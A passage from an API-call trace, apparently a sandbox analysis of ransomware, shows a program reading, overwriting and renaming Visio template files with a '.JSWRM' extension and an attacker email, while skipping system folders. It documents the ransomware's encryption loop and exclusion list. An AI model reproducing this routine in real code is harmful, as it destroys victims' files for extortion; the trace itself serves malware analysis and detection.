returned 1 [0144.481] lstrcmpiW (lpString1="BASICD_U.VSTX", lpString2=".") returned 1 [0144.481] lstrcmpiW (lpString1="BASICD_U.VSTX", lpString2="..") returned 1 [0144.481] lstrcmpiW (lpString1="BASICD_U.VSTX", lpString2="...") returned 1 [0144.481] lstrcmpiW (lpString1="BASICD_U.VSTX", lpString2="windows") returned -1 [0144.481] lstrcmpiW (lpString1="BASICD_U.VSTX", lpString2="recovery") returned -1 [0144.481] lstrcmpiW (lpString1="BASICD_U.VSTX", lpString2="perflogs") returned -1 [0144.481] lstrcmpiW (lpString1="BASICD_U.VSTX", lpString2="documents and settings") returned -1 [0144.481] lstrcmpiW (lpString1="BASICD_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0144.481] lstrcmpiW (lpString1="BASICD_U.VSTX", lpString2="system volume information") returned -1 [0144.481] lstrcmpiW (lpString1="BASICD_U.VSTX", lpString2="msocache") returned -1 [0144.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASICD_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASICD_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASICD_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0144.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASICD_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASICD_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASICD_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0144.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.481] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASICD_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basicd_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.482] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=17417) returned 1 [0144.482] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.482] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4400, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x4400, lpOverlapped=0x0) returned 1 [0144.485] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.485] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4400, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x4400, lpOverlapped=0x0) returned 1 [0144.485] CloseHandle (hObject=0x314) returned 1 [0144.485] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASICD_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basicd_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASICD_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basicd_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.486] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4986ebe, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4986ebe, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4986ebe, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x132da, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BASICELECTRICAL_DIAGRAM_M.VSTX", cAlternateFileName="BASICE~1.VST")) returned 1 [0144.486] lstrcmpiW (lpString1="BASICELECTRICAL_DIAGRAM_M.VSTX", lpString2=".") returned 1 [0144.486] lstrcmpiW (lpString1="BASICELECTRICAL_DIAGRAM_M.VSTX", lpString2="..") returned 1 [0144.486] lstrcmpiW (lpString1="BASICELECTRICAL_DIAGRAM_M.VSTX", lpString2="...") returned 1 [0144.486] lstrcmpiW (lpString1="BASICELECTRICAL_DIAGRAM_M.VSTX", lpString2="windows") returned -1 [0144.486] lstrcmpiW (lpString1="BASICELECTRICAL_DIAGRAM_M.VSTX", lpString2="recovery") returned -1 [0144.486] lstrcmpiW (lpString1="BASICELECTRICAL_DIAGRAM_M.VSTX", lpString2="perflogs") returned -1 [0144.486] lstrcmpiW (lpString1="BASICELECTRICAL_DIAGRAM_M.VSTX", lpString2="documents and settings") returned -1 [0144.486] lstrcmpiW (lpString1="BASICELECTRICAL_DIAGRAM_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0144.486] lstrcmpiW (lpString1="BASICELECTRICAL_DIAGRAM_M.VSTX", lpString2="system volume information") returned -1 [0144.486] lstrcmpiW (lpString1="BASICELECTRICAL_DIAGRAM_M.VSTX", lpString2="msocache") returned -1 [0144.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASICELECTRICAL_DIAGRAM_M.VSTX", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0144.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASICELECTRICAL_DIAGRAM_M.VSTX", cchWideChar=30, lpMultiByteStr=0x241380, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASICELECTRICAL_DIAGRAM_M.VSTX", lpUsedDefaultChar=0x0) returned 30 [0144.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASICELECTRICAL_DIAGRAM_M.VSTX", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0144.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASICELECTRICAL_DIAGRAM_M.VSTX", cchWideChar=30, lpMultiByteStr=0x2410d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASICELECTRICAL_DIAGRAM_M.VSTX", lpUsedDefaultChar=0x0) returned 30 [0144.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.487] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASICELECTRICAL_DIAGRAM_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basicelectrical_diagram_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.488] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=78554) returned 1 [0144.488] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.488] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x132d0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x132d0, lpOverlapped=0x0) returned 1 [0144.537] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.537] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x132d0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x132d0, lpOverlapped=0x0) returned 1 [0144.538] CloseHandle (hObject=0x314) returned 1 [0144.538] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASICELECTRICAL_DIAGRAM_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basicelectrical_diagram_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASICELECTRICAL_DIAGRAM_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basicelectrical_diagram_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.541] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4986ebe, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4986ebe, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4986ebe, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x1217e, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BASICELECTRICAL_DIAGRAM_U.VSTX", cAlternateFileName="BASICE~2.VST")) returned 1 [0144.541] lstrcmpiW (lpString1="BASICELECTRICAL_DIAGRAM_U.VSTX", lpString2=".") returned 1 [0144.541] lstrcmpiW (lpString1="BASICELECTRICAL_DIAGRAM_U.VSTX", lpString2="..") returned 1 [0144.541] lstrcmpiW (lpString1="BASICELECTRICAL_DIAGRAM_U.VSTX", lpString2="...") returned 1 [0144.541] lstrcmpiW (lpString1="BASICELECTRICAL_DIAGRAM_U.VSTX", lpString2="windows") returned -1 [0144.541] lstrcmpiW (lpString1="BASICELECTRICAL_DIAGRAM_U.VSTX", lpString2="recovery") returned -1 [0144.541] lstrcmpiW (lpString1="BASICELECTRICAL_DIAGRAM_U.VSTX", lpString2="perflogs") returned -1 [0144.541] lstrcmpiW (lpString1="BASICELECTRICAL_DIAGRAM_U.VSTX", lpString2="documents and settings") returned -1 [0144.541] lstrcmpiW (lpString1="BASICELECTRICAL_DIAGRAM_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0144.541] lstrcmpiW (lpString1="BASICELECTRICAL_DIAGRAM_U.VSTX", lpString2="system volume information") returned -1 [0144.541] lstrcmpiW (lpString1="BASICELECTRICAL_DIAGRAM_U.VSTX", lpString2="msocache") returned -1 [0144.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASICELECTRICAL_DIAGRAM_U.VSTX", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0144.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASICELECTRICAL_DIAGRAM_U.VSTX", cchWideChar=30, lpMultiByteStr=0x2411c8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASICELECTRICAL_DIAGRAM_U.VSTX", lpUsedDefaultChar=0x0) returned 30 [0144.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASICELECTRICAL_DIAGRAM_U.VSTX", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0144.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASICELECTRICAL_DIAGRAM_U.VSTX", cchWideChar=30, lpMultiByteStr=0x2411f0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASICELECTRICAL_DIAGRAM_U.VSTX", lpUsedDefaultChar=0x0) returned 30 [0144.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASICELECTRICAL_DIAGRAM_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basicelectrical_diagram_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.542] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=74110) returned 1 [0144.542] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.543] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x12170, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x12170, lpOverlapped=0x0) returned 1 [0144.549] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.549] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x12170, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x12170, lpOverlapped=0x0) returned 1 [0144.550] CloseHandle (hObject=0x314) returned 1 [0144.550] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASICELECTRICAL_DIAGRAM_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basicelectrical_diagram_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASICELECTRICAL_DIAGRAM_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basicelectrical_diagram_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.552] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x493a87e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x493a87e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x493a87e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xe69b, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BASIC_AUDITDIAGRAM_M.VSTX", cAlternateFileName="BASIC_~1.VST")) returned 1 [0144.552] lstrcmpiW (lpString1="BASIC_AUDITDIAGRAM_M.VSTX", lpString2=".") returned 1 [0144.552] lstrcmpiW (lpString1="BASIC_AUDITDIAGRAM_M.VSTX", lpString2="..") returned 1 [0144.552] lstrcmpiW (lpString1="BASIC_AUDITDIAGRAM_M.VSTX", lpString2="...") returned 1 [0144.552] lstrcmpiW (lpString1="BASIC_AUDITDIAGRAM_M.VSTX", lpString2="windows") returned -1 [0144.552] lstrcmpiW (lpString1="BASIC_AUDITDIAGRAM_M.VSTX", lpString2="recovery") returned -1 [0144.552] lstrcmpiW (lpString1="BASIC_AUDITDIAGRAM_M.VSTX", lpString2="perflogs") returned -1 [0144.552] lstrcmpiW (lpString1="BASIC_AUDITDIAGRAM_M.VSTX", lpString2="documents and settings") returned -1 [0144.552] lstrcmpiW (lpString1="BASIC_AUDITDIAGRAM_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0144.552] lstrcmpiW (lpString1="BASIC_AUDITDIAGRAM_M.VSTX", lpString2="system volume information") returned -1 [0144.552] lstrcmpiW (lpString1="BASIC_AUDITDIAGRAM_M.VSTX", lpString2="msocache") returned -1 [0144.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_AUDITDIAGRAM_M.VSTX", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0144.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_AUDITDIAGRAM_M.VSTX", cchWideChar=25, lpMultiByteStr=0x241218, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASIC_AUDITDIAGRAM_M.VSTX", lpUsedDefaultChar=0x0) returned 25 [0144.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_AUDITDIAGRAM_M.VSTX", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0144.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_AUDITDIAGRAM_M.VSTX", cchWideChar=25, lpMultiByteStr=0x2410d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASIC_AUDITDIAGRAM_M.VSTX", lpUsedDefaultChar=0x0) returned 25 [0144.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.552] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_AUDITDIAGRAM_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_auditdiagram_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.554] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=59035) returned 1 [0144.554] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.554] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xe690, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xe690, lpOverlapped=0x0) returned 1 [0144.560] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.560] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xe690, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xe690, lpOverlapped=0x0) returned 1 [0144.561] CloseHandle (hObject=0x314) returned 1 [0144.561] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_AUDITDIAGRAM_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_auditdiagram_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_AUDITDIAGRAM_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_auditdiagram_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.562] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x493a87e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x493a87e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x493a87e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xde18, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BASIC_AUDITDIAGRAM_U.VSTX", cAlternateFileName="BASIC_~2.VST")) returned 1 [0144.562] lstrcmpiW (lpString1="BASIC_AUDITDIAGRAM_U.VSTX", lpString2=".") returned 1 [0144.562] lstrcmpiW (lpString1="BASIC_AUDITDIAGRAM_U.VSTX", lpString2="..") returned 1 [0144.562] lstrcmpiW (lpString1="BASIC_AUDITDIAGRAM_U.VSTX", lpString2="...") returned 1 [0144.562] lstrcmpiW (lpString1="BASIC_AUDITDIAGRAM_U.VSTX", lpString2="windows") returned -1 [0144.562] lstrcmpiW (lpString1="BASIC_AUDITDIAGRAM_U.VSTX", lpString2="recovery") returned -1 [0144.562] lstrcmpiW (lpString1="BASIC_AUDITDIAGRAM_U.VSTX", lpString2="perflogs") returned -1 [0144.562] lstrcmpiW (lpString1="BASIC_AUDITDIAGRAM_U.VSTX", lpString2="documents and settings") returned -1 [0144.562] lstrcmpiW (lpString1="BASIC_AUDITDIAGRAM_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0144.562] lstrcmpiW (lpString1="BASIC_AUDITDIAGRAM_U.VSTX", lpString2="system volume information") returned -1 [0144.562] lstrcmpiW (lpString1="BASIC_AUDITDIAGRAM_U.VSTX", lpString2="msocache") returned -1 [0144.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_AUDITDIAGRAM_U.VSTX", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0144.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_AUDITDIAGRAM_U.VSTX", cchWideChar=25, lpMultiByteStr=0x240f70, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASIC_AUDITDIAGRAM_U.VSTX", lpUsedDefaultChar=0x0) returned 25 [0144.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_AUDITDIAGRAM_U.VSTX", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0144.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_AUDITDIAGRAM_U.VSTX", cchWideChar=25, lpMultiByteStr=0x240f20, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASIC_AUDITDIAGRAM_U.VSTX", lpUsedDefaultChar=0x0) returned 25 [0144.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_AUDITDIAGRAM_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_auditdiagram_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.564] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=56856) returned 1 [0144.564] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.564] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xde10, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xde10, lpOverlapped=0x0) returned 1 [0144.569] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.569] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xde10, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xde10, lpOverlapped=0x0) returned 1 [0144.571] CloseHandle (hObject=0x314) returned 1 [0144.571] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_AUDITDIAGRAM_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_auditdiagram_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_AUDITDIAGRAM_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_auditdiagram_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.572] 